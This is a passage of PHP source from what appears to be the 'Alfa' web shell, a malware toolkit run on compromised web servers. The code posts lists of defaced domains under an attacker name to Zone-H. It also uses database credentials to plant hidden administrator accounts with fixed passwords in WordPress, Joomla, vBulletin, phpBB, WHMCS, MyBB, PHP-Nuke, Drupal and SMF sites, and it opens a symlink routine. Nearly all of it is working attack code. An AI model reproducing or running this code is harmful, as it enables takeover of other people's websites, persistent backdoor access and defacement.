2590. " value="'.$x.'">'.$mode.'</option>');
2591. $x++;
2592. } echo '</select><br><select id="text" name="reason" style="width:200px;
2593. ">';
2594. $x=1;
2595. foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);
2596. " value="'.$x.'">'.$mode.'</option>');
2597. $x++;
2598. } echo '</select><br>
2599. <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
2600. <p><input type="submit" value=" " name="go" /></p>
2601. </form></center>';
2602. if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){ ob_start();
2603. $hacker = $_POST['alfa1'];
2604. $method = $_POST['alfa2'];
2605. $neden = $_POST['alfa3'];
2606. $site = $_POST['alfa4'];
2607. if(empty($hacker)){ die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
2608. }elseif($method == "------------------------------------SELECT-------------------------------------"){ die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
2609. }elseif($neden == "------------------------------------SELECT-------------------------------------"){ die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
2610. }elseif(empty($site)){ die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
2611. } $i = 0;
2612. $sites = explode("\n", $site);
2613. $alfa = new AlfaCURL();
2614. while($i < count($sites)){ if(substr($sites[$i], 0, 4) != "http"){ $sites[$i] = "http://".$sites[$i];
2615. } $alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
2616. ++$i;
2617. } echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
2618. } echo "</div>";
2619. alfafooter();
2620. } function alfapwchanger(){ alfahead();
2621. ALfaNum();
2622. echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
2623. <center><h3>';
2624. $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
2625. Alfa_Create_A_Tag('pwchanger',$vals);
2626. echo '</h3></center>';
2627. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){ ALfaNum(1);
2628. echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
2629. <p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);
2630. return false;
2631. " method="POST">';
2632. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
2633. create_table($table);
2634. echo '<p><input value=" " name="send" type="submit"></p></form>';
2635. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){ $localhost = $_POST['alfa3'];
2636. $database = $_POST['alfa4'];
2637. $username = $_POST['alfa5'];
2638. $password = $_POST['alfa6'];
2639. $admin = $_POST['alfa8'];
2640. $SQL = $_POST['alfa9'];
2641. $prefix = $_POST['alfa10'];
2642. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2643. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
2644. $solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
2645. $sole = @mysqli_num_rows($solevisible);
2646. if ($sole == 1){ $solevis = @mysqli_fetch_assoc($solevisible);
2647. $res = $solevis['ID'];
2648. } $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible')") or die(mysqli_error($conn));
2649. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','last_name','solevisible')") or die(mysqli_error($conn));
2650. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','nickname','solevisible')") or die(mysqli_error($conn));
2651. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','description','solevisible')") or die(mysqli_error($conn));
2652. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','rich_editing','true')") or die(mysqli_error($conn));
2653. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','comment_shortcuts','false')") or die(mysqli_error($conn));
2654. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','admin_color','fresh')") or die(mysqli_error($conn));
2655. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','use_ssl','0')") or die(mysqli_error($conn));
2656. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_admin_bar_front','true')") or die(mysqli_error($conn));
2657. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_capabilities','a:1:{s:13:\"administrator\";
2658. b:1;
2659. }')") or die(mysqli_error($conn));
2660. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_user_level','10')") or die(mysqli_error($conn));
2661. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','dismissed_wp_pointers','wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media')") or die(mysqli_error($conn));
2662. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_welcome_panel','1')") or die(mysqli_error($conn));
2663. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
2664. if($solevisible){ __alert('Success... '.$admin.' is created...');
2665. } } } if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){ ALfaNum(2);
2666. echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);
2667. return false;
2668. " method="POST">';
2669. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
2670. create_table($table);
2671. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2672. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa3'];
2673. $database = $_POST['alfa4'];
2674. $username = $_POST['alfa5'];
2675. $password = $_POST['alfa6'];
2676. $admin = $_POST['alfa8'];
2677. $SQL = $_POST['alfa9'];
2678. $prefix = $_POST['alfa10'];
2679. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2680. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
2681. $solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
2682. $sole =@mysqli_num_rows($solevisible);
2683. if ($sole == 1){ $solevis =@mysqli_fetch_assoc($solevisible);
2684. $res = $solevis['id'];
2685. } $solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
2686. if($solevisible){ __alert('Success... '.$admin.' is created...');
2687. } } } if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){ ALfaNum(4);
2688. echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value);
2689. return false;
2690. " method="POST">';
2691. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
2692. create_table($table);
2693. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2694. if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
2695. $database = $_POST['alfa3'];
2696. $username = $_POST['alfa5'];
2697. $password = $_POST['alfa6'];
2698. $prefix = $_POST['alfa7'];
2699. $admin = $_POST['alfa8'];
2700. $SQL = $_POST['alfa9'];
2701. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2702. $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
2703. $solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
2704. $sole = mysqli_num_rows($solevisible);
2705. if($sole == 1){ $solevis = mysqli_fetch_assoc($solevisible);
2706. $res = $solevis['userid'];
2707. } $solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
2708. if($solevisible){ __alert('Success... '.$admin.' is created...');
2709. } } } if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){ ALfaNum(5);
2710. echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value);
2711. return false;
2712. " method="POST">';
2713. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
2714. create_table($table);
2715. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2716. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
2717. $database = $_POST['alfa3'];
2718. $username = $_POST['alfa4'];
2719. $password = $_POST['alfa6'];
2720. $admin = $_POST['alfa8'];
2721. $SQL = $_POST['alfa9'];
2722. $prefix = $_POST['alfa10'];
2723. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2724. $hash = md5('solevisible');
2725. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
2726. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
2727. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
2728. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
2729. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
2730. if($solevisible){ __alert('Success... '.$admin.' is created...');
2731. } } } if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){ ALfaNum(6);
2732. echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value);
2733. return false;
2734. " method="POST">';
2735. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
2736. create_table($table);
2737. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2738. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
2739. $database = $_POST['alfa3'];
2740. $username = $_POST['alfa4'];
2741. $password = $_POST['alfa5'];
2742. $admin = $_POST['alfa8'];
2743. $SQL = $_POST['alfa9'];
2744. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2745. $solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
2746. if($solevisible){ __alert('Success... '.$admin.' is created...');
2747. } } } if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){ ALfaNum(7);
2748. echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value);
2749. return false;
2750. " method="POST">';
2751. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
2752. create_table($table);
2753. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2754. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
2755. $database = $_POST['alfa3'];
2756. $username = $_POST['alfa4'];
2757. $password = $_POST['alfa5'];
2758. $admin = $_POST['alfa8'];
2759. $SQL = $_POST['alfa9'];
2760. $prefix = $_POST['alfa10'];
2761. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2762. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
2763. if($solevisible){ __alert('Success... '.$admin.' is created...');
2764. } } } if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){ ALfaNum(8);
2765. echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value);
2766. return false;
2767. " method="POST">';
2768. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
2769. create_table($table);
2770. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2771. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
2772. $database = $_POST['alfa3'];
2773. $username = $_POST['alfa4'];
2774. $password = $_POST['alfa5'];
2775. $admin = $_POST['alfa7'];
2776. $SQL = $_POST['alfa9'];
2777. $prefix = $_POST['alfa10'];
2778. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2779. $hash = md5($pwd);
2780. $solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
2781. if($solevisible){ __alert('Success... '.$admin.' is created...');
2782. } } } if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){ ALfaNum(9);
2783. echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\');
2784. return false;
2785. " method="POST">';
2786. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true) );
2787. create_table($table);
2788. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2789. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
2790. $database = $_POST['alfa4'];
2791. $username = $_POST['alfa5'];
2792. $password = $_POST['alfa6'];
2793. $admin = $_POST['alfa8'];
2794. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2795. $getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
2796. $getDescuid = @mysqli_fetch_assoc($getDescuid);
2797. $getDescuid = $getDescuid['uid'];
2798. $getdescuid = $getDescuid++;
2799. $solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
2800. $solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
2801. $sole = mysqli_num_rows($solevisible);
2802. if ($sole == 1){ $solevis = mysqli_fetch_assoc($solevisible);
2803. $res = $solevis['uid'];
2804. } $solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
2805. if($solevisible){ __alert('Success... '.$admin.' is created...');
2806. } } } if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){ ALfaNum(10);
2807. echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\');
2808. return false;
2809. " method="POST">';
2810. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), );
2811. create_table($table);
2812. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
2813. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2'];
2814. $database = $_POST['alfa3'];
2815. $username = $_POST['alfa5'];
2816. $password = $_POST['alfa6'];
2817. $prefix = $_POST['alfa7'];
2818. $admin = $_POST['alfa8'];
2819. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
2820. $setpwAlg = sha1(strtolower($admin) . 'solevisible');
2821. $solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
2822. if($solevisible){ __alert('Success... '.$admin.' is created...');
2823. } } } echo "</div>";
2824. alfafooter();
2825. } function alfasymlink(){ alfahead();
2826. $solevisible8 = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2827. $solevisible55=explode('/',$solevisible8 );
2828. $solevisible8 =str_replace($solevisible55[count($solevisible55)-1],'',$solevisible8 );
2829. AlfaNum(9,10);
